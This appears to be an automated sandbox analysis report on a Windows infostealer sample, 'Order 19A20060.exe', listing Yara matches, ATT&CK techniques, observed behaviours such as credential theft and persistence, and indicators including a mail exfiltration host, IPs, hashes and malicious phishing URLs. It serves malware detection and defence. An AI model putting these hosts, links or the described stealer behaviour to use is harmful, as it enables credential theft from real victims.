Source: Yara match | File source: 0.2.Order 19A20060.exe.349648c.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Order 19A20060.exe.347842c.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Order 19A20060.exe.31a0e40.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Order 19A20060.exe.7a40000.14.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.SgJzugoOJvLgL.exe.25a0e5c.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Order 19A20060.exe.31a0e40.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Order 19A20060.exe.4169970.10.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.SgJzugoOJvLgL.exe.2590e50.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Order 19A20060.exe.3477414.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.SgJzugoOJvLgL.exe.289658c.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Order 19A20060.exe.3190e28.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Order 19A20060.exe.77b0000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Order 19A20060.exe.349648c.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Order 19A20060.exe.77b0000.12.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.SgJzugoOJvLgL.exe.28587d0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Order 19A20060.exe.7a40000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Order 19A20060.exe.4169970.10.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.SgJzugoOJvLgL.exe.25a0e5c.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.SgJzugoOJvLgL.exe.28497a0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Order 19A20060.exe.34586d0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.SgJzugoOJvLgL.exe.284e7b8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1682578950.00000000077B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.1714009771.000000000281D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1682974196.0000000007A40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.1714009771.0000000002896000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1678263931.00000000031A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.1714009771.00000000025A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1678263931.0000000003458000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1679354233.0000000004169000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.1714009771.0000000002561000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1678263931.0000000003161000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1678263931.0000000003496000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 121 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 11 Disable or Modify Tools | 1 OS Credential Dumping | 1 File and Directory Discovery | Remote Services | 11 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 1 Scheduled Task/Job | 1 Scheduled Task/Job | 111 Process Injection | 1 Deobfuscate/Decode Files or Information | 21 Input Capture | 24 System Information Discovery | Remote Desktop Protocol | 1 Data from Local System | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 Scheduled Task/Job | 3 Obfuscated Files or Information | 1 Credentials in Registry | 1 Query Registry | SMB/Windows Admin Shares | 1 Email Collection | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 22 Software Packing | NTDS | 211 Security Software Discovery | Distributed Component Object Model | 21 Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Timestomp | LSA Secrets | 1 Process Discovery | SSH | 1 Clipboard Data | 23 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 141 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Masquerading | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 141 Virtualization/Sandbox Evasion | Proc Filesystem | 1 System Network Configuration Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 111 Process Injection | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
Behavior Graph ID: 1399297 | Sample: Order 19A20060.exe | Startdate: 27/02/2024 | Architecture: WINDOWS | Score: 100

Behavior graph contents (recovered from the rendered graph):

• Network: mail.elec-qatar.com (50.87.139.143, ports 49735, 49739, 587, UNIFIEDLAYER-AS-1US, United States); api.ipify.org (104.26.12.205, ports 443, 49734, 49738, CLOUDFLARENETUS, United States)
• Top-level signatures: Snort IDS alert for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 15 other signatures
• Order 19A20060.exe: drops C:\Users\user\AppData\...\SgJzugoOJvLgL.exe (PE32) and C:\Users\user\AppData\Local\...\tmp514A.tmp (XML); Adds a directory exclusion to Windows Defender; Injects a PE file into a foreign processes; starts Order 19A20060.exe, powershell.exe (two instances) and schtasks.exe
• Child Order 19A20060.exe: connects to mail.elec-qatar.com and api.ipify.org; Installs a global keyboard hook
• SgJzugoOJvLgL.exe: Multi AV Scanner detection for dropped file; Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Machine Learning detection for dropped file; starts SgJzugoOJvLgL.exe (three instances) and schtasks.exe
• Child SgJzugoOJvLgL.exe: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc)
• powershell.exe and schtasks.exe instances each start conhost.exe; one powershell.exe also starts WmiPrvSE.exe

Source | Detection | Scanner | Label
Order 19A20060.exe | 68% | ReversingLabs | ByteCode-MSIL.Trojan.Taskun
Order 19A20060.exe | 38% | Virustotal |
Order 19A20060.exe | 100% | Joe Sandbox ML |

Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe | 68% | ReversingLabs | ByteCode-MSIL.Trojan.Taskun
C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe | 38% | Virustotal |

No Antivirus matches

Source | Detection | Scanner | Label
mail.elec-qatar.com | 2% | Virustotal |
Source | Detection | Scanner | Label
http://www.tiro.com | 0% | URL Reputation | safe
http://www.goodfont.co.kr | 0% | URL Reputation | safe
http://www.carterandcone.coml | 0% | URL Reputation | safe
http://www.sajatypeworks.com | 0% | URL Reputation | safe
http://www.typography.netD | 0% | URL Reputation | safe
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
http://www.sandoll.co.kr | 0% | URL Reputation | safe
http://www.urwpp.deDPlease | 0% | URL Reputation | safe
http://www.sakkal.com | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/bThe | 0% | Avira URL Cloud | safe
http://www.founder.com.cn/cn | 0% | Avira URL Cloud | safe
http://www.founder.com.cn/cn/cThe | 0% | Avira URL Cloud | safe
http://www.zhongyicts.com.cn | 0% | Avira URL Cloud | safe
https://www.chiark.greenend.org.uk/~sgtatham/putty/0 | 0% | Avira URL Cloud | safe
http://mail.elec-qatar.com | 0% | Avira URL Cloud | safe
http://mail.elec-qatar.com | 2% | Virustotal |
http://www.founder.com.cn/cn/bThe | 0% | Virustotal |
http://www.zhongyicts.com.cn | 1% | Virustotal |
http://www.founder.com.cn/cn | 0% | Virustotal |
https://www.chiark.greenend.org.uk/~sgtatham/putty/0 | 1% | Virustotal |
http://www.founder.com.cn/cn/cThe | 0% | Virustotal |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
api.ipify.org | 104.26.12.205 | true | false | | high
mail.elec-qatar.com | 50.87.139.143 | true | true | | unknown

Name | Malicious | Antivirus Detection | Reputation
https://api.ipify.org/ | false | | high
                            NameSourceMaliciousAntivirus DetectionReputation
                            http://www.apache.org/licenses/LICENSE-2.0Order 19A20060.exe, 00000000.00000002.1681961884.00000000072D2000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://www.fontbureau.comOrder 19A20060.exe, 00000000.00000002.1681961884.00000000072D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://www.fontbureau.com/designersGOrder 19A20060.exe, 00000000.00000002.1681961884.00000000072D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://www.fontbureau.com/designers/?Order 19A20060.exe, 00000000.00000002.1681961884.00000000072D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://www.founder.com.cn/cn/bTheOrder 19A20060.exe, 00000000.00000002.1681961884.00000000072D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • 0%, Virustotal, Browse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://account.dyn.com/Order 19A20060.exe, 00000000.00000002.1679354233.0000000004443000.00000004.00000800.00020000.00000000.sdmp, Order 19A20060.exe, 00000000.00000002.1679354233.0000000004DD1000.00000004.00000800.00020000.00000000.sdmp, Order 19A20060.exe, 00000008.00000002.4094342515.0000000000428000.00000040.00000400.00020000.00000000.sdmpfalse
                                      high
                                      http://www.fontbureau.com/designers?Order 19A20060.exe, 00000000.00000002.1681961884.00000000072D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://www.tiro.comOrder 19A20060.exe, 00000000.00000002.1681961884.00000000072D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://www.fontbureau.com/designersOrder 19A20060.exe, 00000000.00000002.1681961884.00000000072D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://www.goodfont.co.krOrder 19A20060.exe, 00000000.00000002.1681961884.00000000072D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          https://api.ipify.org/tOrder 19A20060.exe, 00000008.00000002.4097970191.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, SgJzugoOJvLgL.exe, 0000000F.00000002.4097929274.0000000002B61000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://www.chiark.greenend.org.uk/~sgtatham/putty/0Order 19A20060.exe, SgJzugoOJvLgL.exe.0.drfalse
                                            • 1%, Virustotal, Browse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.carterandcone.comlOrder 19A20060.exe, 00000000.00000002.1681961884.00000000072D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.sajatypeworks.comOrder 19A20060.exe, 00000000.00000002.1681961884.00000000072D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.typography.netDOrder 19A20060.exe, 00000000.00000002.1681961884.00000000072D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
URL | Source | Malicious | Antivirus Detection | Reputation
http://www.fontbureau.com/designers/cabarga.htmlN | Order 19A20060.exe, 00000000.00000002.1681961884.00000000072D2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.founder.com.cn/cn/cThe | Order 19A20060.exe, 00000000.00000002.1681961884.00000000072D2000.00000004.00000800.00020000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
http://www.galapagosdesign.com/staff/dennis.htm | Order 19A20060.exe, 00000000.00000002.1681961884.00000000072D2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://api.ipify.org | Order 19A20060.exe, 00000000.00000002.1679354233.0000000004443000.00000004.00000800.00020000.00000000.sdmp, Order 19A20060.exe, 00000000.00000002.1679354233.0000000004DD1000.00000004.00000800.00020000.00000000.sdmp, Order 19A20060.exe, 00000008.00000002.4097970191.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, Order 19A20060.exe, 00000008.00000002.4094342515.0000000000428000.00000040.00000400.00020000.00000000.sdmp, SgJzugoOJvLgL.exe, 0000000F.00000002.4097929274.0000000002B61000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.founder.com.cn/cn | Order 19A20060.exe, 00000000.00000002.1681961884.00000000072D2000.00000004.00000800.00020000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
http://www.fontbureau.com/designers/frere-user.html | Order 19A20060.exe, 00000000.00000002.1681961884.00000000072D2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.jiyu-kobo.co.jp/ | Order 19A20060.exe, 00000000.00000002.1681961884.00000000072D2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://mail.elec-qatar.com | Order 19A20060.exe, 00000008.00000002.4097970191.0000000002EE7000.00000004.00000800.00020000.00000000.sdmp, SgJzugoOJvLgL.exe, 0000000F.00000002.4097929274.0000000002BD7000.00000004.00000800.00020000.00000000.sdmp | false | 2%, Virustotal; Avira URL Cloud: safe | unknown
http://www.galapagosdesign.com/DPlease | Order 19A20060.exe, 00000000.00000002.1681961884.00000000072D2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers8 | Order 19A20060.exe, 00000000.00000002.1681961884.00000000072D2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fonts.com | Order 19A20060.exe, 00000000.00000002.1681961884.00000000072D2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.sandoll.co.kr | Order 19A20060.exe, 00000000.00000002.1681961884.00000000072D2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.urwpp.deDPlease | Order 19A20060.exe, 00000000.00000002.1681961884.00000000072D2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.zhongyicts.com.cn | Order 19A20060.exe, 00000000.00000002.1681961884.00000000072D2000.00000004.00000800.00020000.00000000.sdmp | false | 1%, Virustotal; Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | Order 19A20060.exe, 00000000.00000002.1678263931.00000000031A0000.00000004.00000800.00020000.00000000.sdmp, Order 19A20060.exe, 00000008.00000002.4097970191.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, SgJzugoOJvLgL.exe, 00000009.00000002.1714009771.00000000025C4000.00000004.00000800.00020000.00000000.sdmp, SgJzugoOJvLgL.exe, 0000000F.00000002.4097929274.0000000002B61000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.sakkal.com | Order 19A20060.exe, 00000000.00000002.1681895785.0000000005C10000.00000004.00000020.00020000.00000000.sdmp, Order 19A20060.exe, 00000000.00000002.1681961884.00000000072D2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
104.26.12.205 | api.ipify.org | United States | 13335 | CLOUDFLARENETUS | false
50.87.139.143 | mail.elec-qatar.com | United States | 46606 | UNIFIEDLAYER-AS-1US | true
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1399297
Start date and time: 2024-02-27 10:08:08 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 31s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 20
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Order 19A20060.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@23/15@2/2
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 97%
• Number of executed functions: 222
• Number of non-executed functions: 30
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
Time | Type | Description
09:08:57 | Task Scheduler | Run new task: SgJzugoOJvLgL path: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe
10:08:55 | API Interceptor | 9746488x Sleep call for process: Order 19A20060.exe modified
10:08:57 | API Interceptor | 26x Sleep call for process: powershell.exe modified
10:08:59 | API Interceptor | 8075865x Sleep call for process: SgJzugoOJvLgL.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
104.26.12.205 | SecuriteInfo.com.Backdoor.Win32.Agent.myuuxz.13708.17224.exe | malicious | Bunny Loader | api.ipify.org/
104.26.12.205 | lods.cmd | malicious | Remcos | api.ipify.org/
50.87.139.143 | Proforma Invoice.exe | malicious | AgentTesla, PureLog Stealer |
50.87.139.143 | SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe | malicious | AgentTesla, PureLog Stealer |
50.87.139.143 | SHIPPING DOC.exe | malicious | AgentTesla, PureLog Stealer |
50.87.139.143 | New order.bat.exe | malicious | AgentTesla, PureLog Stealer |
50.87.139.143 | Quotation R2100131410.exe | malicious | AgentTesla, PureLog Stealer |
50.87.139.143 | SecuriteInfo.com.Trojan.MSIL.Krypt.2433.31957.exe | malicious | AgentTesla, PureLog Stealer |
50.87.139.143 | z92BankingDetails.exe | malicious | AgentTesla |
50.87.139.143 | z14Paymentslip.exe | malicious | AgentTesla |
50.87.139.143 | PO_0130717.exe | malicious | AgentTesla |
50.87.139.143 | SecuriteInfo.com.Win32.RATX-gen.20501.5539.exe | malicious | AgentTesla, zgRAT |
Match | Associated Sample Name / URL | Detection | Threat Name | Context
api.ipify.org | https://secure.adnxs.com/clktrb?id=360572&redir=//barslaves.com/guedassea/Novozymes/amVia0Bub3ZvenltZXMuY29t | malicious | HTMLPhisher | 104.26.12.205
api.ipify.org | Proforma Invoice.exe | malicious | AgentTesla, PureLog Stealer | 172.67.74.152
api.ipify.org | Doc-0113687pdf.exe | malicious | AgentTesla, PureLog Stealer, RedLine | 172.67.74.152
api.ipify.org | http://accedii.194-48-251-87.cprapid.com/index.php | malicious | HTMLPhisher | 104.26.12.205
api.ipify.org | http://web.logodesign.net/preview/8bf6d88a?device=desktop | malicious | HTMLPhisher | 104.26.13.205
api.ipify.org | Arrival Notice.pif.exe | malicious | AgentTesla, PureLog Stealer | 104.26.12.205
api.ipify.org | NEW PO (PO01-240111).exe | malicious | AgentTesla, PureLog Stealer | 104.26.12.205
api.ipify.org | NEW PO (PO01-26022024).exe | malicious | AgentTesla, PureLog Stealer | 104.26.12.205
api.ipify.org | EGF.exe | malicious | AgentTesla | 172.67.74.152
api.ipify.org | BCAF23090415-FA-INV.exe | malicious | AgentTesla, PureLog Stealer | 172.67.74.152
mail.elec-qatar.com | Proforma Invoice.exe | malicious | AgentTesla, PureLog Stealer | 50.87.139.143
mail.elec-qatar.com | SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe | malicious | AgentTesla, PureLog Stealer | 50.87.139.143
mail.elec-qatar.com | SHIPPING DOC.exe | malicious | AgentTesla, PureLog Stealer | 50.87.139.143
mail.elec-qatar.com | New order.bat.exe | malicious | AgentTesla, PureLog Stealer | 50.87.139.143
mail.elec-qatar.com | Quotation R2100131410.exe | malicious | AgentTesla, PureLog Stealer | 50.87.139.143
mail.elec-qatar.com | SecuriteInfo.com.Trojan.MSIL.Krypt.2433.31957.exe | malicious | AgentTesla, PureLog Stealer | 50.87.139.143
mail.elec-qatar.com | z92BankingDetails.exe | malicious | AgentTesla | 50.87.139.143
mail.elec-qatar.com | z14Paymentslip.exe | malicious | AgentTesla | 50.87.139.143
mail.elec-qatar.com | PO_0130717.exe | malicious | AgentTesla | 50.87.139.143
mail.elec-qatar.com | SecuriteInfo.com.Win32.RATX-gen.20501.5539.exe | malicious | AgentTesla, zgRAT | 50.87.139.143
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | https://shellmarine.my.site.com/PartnersInSafety/login?c=ZcFpk6Z.xNZw1ykDfn.Be9v35Zh4v7iOpvR7KqFUVXjlNAN_1X9_m0AHXZMSWs_QPCV3_3c3YLNlz9YiM.JzWaWCfa0Lb9nsY_EPjqXBv25eef02TJT3QR8Bs5pJOZPluxyBxg17IgXjBgIpHwphrBjR_Y63IpDPS97sUBivy7qO0.dVduyhncdbQ4QoGEDIAPaQsjp4 | malicious | Unknown | 1.1.1.1
CLOUDFLARENETUS | https://secure.adnxs.com/clktrb?id=360572&redir=//barslaves.com/guedassea/Novozymes/amVia0Bub3ZvenltZXMuY29t | malicious | HTMLPhisher | 172.67.172.36
CLOUDFLARENETUS | Proforma Invoice.exe | malicious | AgentTesla, PureLog Stealer | 172.67.74.152
CLOUDFLARENETUS | Quotation Drawing Specification.exe | malicious | Remcos | 172.67.200.220
CLOUDFLARENETUS | BBKKOUO PDF.exe | malicious | FormBook, PureLog Stealer | 172.67.177.75
CLOUDFLARENETUS | Doc-0113687pdf.exe | malicious | AgentTesla, PureLog Stealer, RedLine | 172.67.74.152
CLOUDFLARENETUS | http://document-85cc2.web.app | malicious | Unknown | 104.26.5.119
CLOUDFLARENETUS | https://docs.google.com/forms/u/0/d/e/1FAIpQLSe7q5ELD0ukHZ7E6KcHXkiDMqI8vRMEd1vxtrUgZ3-pPemPWQ/viewscore?vc=0&c=0&w=1&flr=0&viewscore=AE0zAgD_gSPU3bQwis0na0pzUXbgBAd1xpQtr8HDV7R55sQZ0C5IFM4azxVqGdNtN9k8HUM | malicious | GRQ Scam | 172.67.12.83
CLOUDFLARENETUS | xZnG1FFx7L.exe | malicious | LummaC, Glupteba, LummaC Stealer, Mars Stealer, SmokeLoader, Socks5Systemz, Stealc | 104.21.94.2
CLOUDFLARENETUS | https://netorg5340145-my.sharepoint.com/:b:/g/personal/info_curreg_com/EZSUhMT59IlCp8Kk3FQpxOYBrWtNELH-5C2z2AFosN0--g?e=qYrYWh | malicious | HTMLPhisher | 104.17.2.184
UNIFIEDLAYER-AS-1US | Proforma Invoice.exe | malicious | AgentTesla, PureLog Stealer | 50.87.139.143
UNIFIEDLAYER-AS-1US | https://kgp.xfi.mybluehost.me/wp-content/upgrade/maiil/home2/home/support/net/login.php | malicious | Unknown | 50.87.231.172
UNIFIEDLAYER-AS-1US | Arrival Notice.pif.exe | malicious | AgentTesla, PureLog Stealer | 50.87.150.204
UNIFIEDLAYER-AS-1US | https://lookerstudio.google.com/s/pmOrPFC9q6E | malicious | HTMLPhisher | 192.185.182.159
UNIFIEDLAYER-AS-1US | https://api.spently.com/api/spently/click?id=105133&store=hotelcollection&type=OI&cid=6272440696998&url=amoreex.com/Encinacapital/%23anJlc3NhQGVuY2luYWNhcGl0YWwuY29t%2F%3Futm_source%3DDatabase%26utm_medium%3DEmail%26utm_campaign%3DLisini%2520eGifts | malicious | HTMLPhisher | 108.179.193.93
UNIFIEDLAYER-AS-1US | https://tracker.club-os.com/campaign/click?99559ms99559gId=d738c6bd137e6a03157c6c728cbc659e734fc398&test=false&target=https://blicblac%E3%80%82com/#grhrbmVlbHkuZWRkbGVzdG9uQGFtY25ldHdvcmtzLmNvbQ==??kqysne&buhpvbdd/q4vJwGLrOcjgXKyw/t7FqNJad60pBYUT2uZA8g6vHQqWz//bmVlbHkuZWRkbGVzdG9uQGFtY25ldHdvcmtzLmNvbQ==&https://instagram.com | malicious | Fake Captcha, HTMLPhisher | 192.185.148.81
UNIFIEDLAYER-AS-1US | https://tracker.club-os.com/campaign/click?qDomYmsgId=d738c6bd137e6a03157c6c728cbc659e734fc398&test=false&target=qaryaconnect.com/content/6f94e370dff0d5fa0ea5bb98441b64c7/alT1ZF/c2FsZXNub0Bjb2dlbnQtcG93ZXIuY29t | malicious | HtmlDropper, HTMLPhisher | 192.185.112.131
UNIFIEDLAYER-AS-1US | IPELLUZ1_2024-02-26_11_26_26.699.zip | malicious | Unknown | 192.185.106.74
UNIFIEDLAYER-AS-1US | payment form.doc.bat.exe | malicious | FormBook, PureLog Stealer | 50.116.112.104
UNIFIEDLAYER-AS-1US | ORDER #25376283982.exe | malicious | AgentTesla, PureLog Stealer | 50.87.150.204
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | Proforma Invoice.exe | malicious | AgentTesla, PureLog Stealer | 104.26.12.205
3b5074b1b5d032e5620f69f9f700ff0e | Doc-0113687pdf.exe | malicious | AgentTesla, PureLog Stealer, RedLine | 104.26.12.205
3b5074b1b5d032e5620f69f9f700ff0e | Scanned-Statement_Pov03499727628966122376398775274656600052690463249885.wsf | malicious | Unknown | 104.26.12.205
3b5074b1b5d032e5620f69f9f700ff0e | https://www.ungrbly.cn/ | malicious | Unknown | 104.26.12.205
3b5074b1b5d032e5620f69f9f700ff0e | https://libbycolon.autos/serene/dune/?box=violet | malicious | TechSupportScam | 104.26.12.205
3b5074b1b5d032e5620f69f9f700ff0e | https://en-us.secureconnection.moneytransaction.kb4.io | malicious | Unknown | 104.26.12.205
3b5074b1b5d032e5620f69f9f700ff0e | Arrival Notice.pif.exe | malicious | AgentTesla, PureLog Stealer | 104.26.12.205
3b5074b1b5d032e5620f69f9f700ff0e | bTHf.exe | malicious | Njrat | 104.26.12.205
3b5074b1b5d032e5620f69f9f700ff0e | bTGj.exe | malicious | Njrat | 104.26.12.205
3b5074b1b5d032e5620f69f9f700ff0e | bTHf.exe | malicious | Njrat | 104.26.12.205
                                                                            No context
Process: C:\Users\user\Desktop\Order 19A20060.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1216
Entropy (8bit): 5.34331486778365
Encrypted: false
SSDEEP: 24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5: 1330C80CAAC9A0FB172F202485E9B1E8
SHA1: 86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256: B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512: 75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious: false
Reputation: high, very likely benign file
